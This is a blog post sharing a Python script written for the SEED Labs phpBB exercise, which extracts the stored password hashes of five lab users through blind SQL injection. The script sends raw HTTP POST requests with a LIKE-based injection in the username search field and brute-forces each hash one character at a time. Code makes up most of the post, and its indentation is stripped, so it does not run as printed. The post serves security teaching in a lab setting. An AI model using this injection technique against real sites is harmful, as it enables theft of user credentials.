Sunday, April 20, 2014

SQL Injection Script written for SEED Labs

SEED Labs are located here: http://www.cis.syr.edu/~wedu/seed/
These are great labs to learn more about cyber security and penetration testing.

The below script was developed to demonstrate SQL Injection on the phpBB lab that they provide.  Though the lab itself does not require this it was a great script to write.  With the script I extract the passwords for the 5 users that are found on the system.

This script could be made more efficient with instead brute forcing each letter to making them conditional statements.

#!/usr/bin/env python

import os
import re
from socket import *
from time import ctime

BUFSIZE=1024

# Change the hostInput based on your IP Address of the SEED Installation of Ubuntu 9.
hostInput = '172.16.108.140'

userNames = ['admin', 'alice', 'bob', 'carol', 'ted'] 
#userNames = ['ted'] 

userPassword = ''
contentLength = 63

for userName in userNames:
for number in range(1,30):
contentLengthTotal = contentLength + number

for letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
tcpServerSocket = socket(AF_INET, SOCK_STREAM)
remoteServer = (hostInput, 80)
tcpServerSocket.connect(remoteServer)

searchRequest1 = "POST http://www.sqllabmysqlphpbb.com/search.php?mode=searchuser HTTP/1.1\n"
searchRequest2 = "Host: www.sqllabmysqlphpbb.com\n"
searchRequest3 = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1\n"
searchRequest5 = "Accept-Language: en-US,en;q=0.5\n"
searchRequest6 = "Content-Type: application/x-www-form-urlencoded\n"
searchRequest7 = "Content-Length: " + str(contentLengthTotal) + "\n\n"
searchRequest8 = "search_username=4%27+OR+user_password+LIKE+%27" + userPassword + letter + "%25&search=Search\n\n\n"

searchRequest = searchRequest1 + searchRequest2 + searchRequest3 + searchRequest5 + searchRequest6 + searchRequest7 + searchRequest8

#print searchRequest

tcpServerSocket.send(searchRequest)
f = open('/tmp/output', 'w')
initialLength = 0

while True:
pageReturned = tcpServerSocket.recv(BUFSIZE)
if not pageReturned:
break
#print pageReturned
initialLength = initialLength + 1
f.write(pageReturned)
if initialLength == 14:  
break

f.closed
tcpServerSocket.close()

f = open('/tmp/output', 'r')
userNameInFile = '<option value="' + userName + '">'
for line in f:
if userNameInFile in line:
userPassword = userPassword + letter 
f.closed

print "The hash stored as the password for " + userName + " is " + userPassword
userPassword = ''
contentLength = 63



No comments:

Post a Comment

Docker with Juiceshop - Focus on SQL Injection

In preparation for an ethical hacking class that I will be teaching, I wanted to work through a few of the Vulnhub or docker images to refr...